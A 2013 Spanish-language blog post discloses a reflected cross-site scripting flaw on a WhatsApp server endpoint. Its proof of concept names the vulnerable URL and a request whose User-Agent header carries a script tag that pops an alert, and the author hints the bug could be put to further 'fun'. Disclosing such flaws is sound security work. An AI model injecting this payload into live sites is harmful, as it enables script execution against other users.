jueves, 17 de enero de 2013

Whatsapp XSS Headers [USER-AGENT]

... como habia comentado antes sobre mi tiempo de inactividad, hoy decidí divertirme un RATO para aprovechar esos 15 o 30 min sin nada que hacer... ¿Que mejor diversion que divagar en sitios buscando pequeños, basicos o avanzados XSS's ?

Pues bien no pasaron mas de 2:38 Min-Seg cuando ingrese a Whatsapp y note el lindo "detector" de USER-AGENT.



Pues como siempre tenemos ese instinto de "curiosidad" intentamos morir como le paso al pequeño gato curioso, en fin no somos gatos... Por experiencia conozco el tipico pensamiento mediocre de muchos programadores el cual consiste en dedicarle menos tiempo a lo "INTERNO" y que otros usuarios "no pueden ver"... Demasiado mediocre como descuidar Headers, Libs, filtros, etc; Nunca se sabe que tan rapido evoluvione un ataque y benificio XSS asi que segun mi opinion personal es mejor prevenir, aunque este no sea tan CRITICO y LETAL.


PoC 


Url Vulnearble
: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=%3CA%3E&me=%3CB%3E&u[]=%3CC%3E

 
1
2
3
4
5
6
7
8
------------------------------------------------------------------------------
Host: sro.whatsapp.net
User-Agent: [Vuln XSS Simple] <script>alert('@Mazt0r Was Here!')</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
------------------------------------------------------------------------------

Result




Nota: una vulnerabilidad basica y sencilla pero se presta para mucha diversion. (Si entienden a lo que me refiero). 
 

 [Verguenza usar Windows :( --- Pero No tengo PC al momento]


Saludos y Happy Hacking!


Fuente 

No hay comentarios:

Publicar un comentario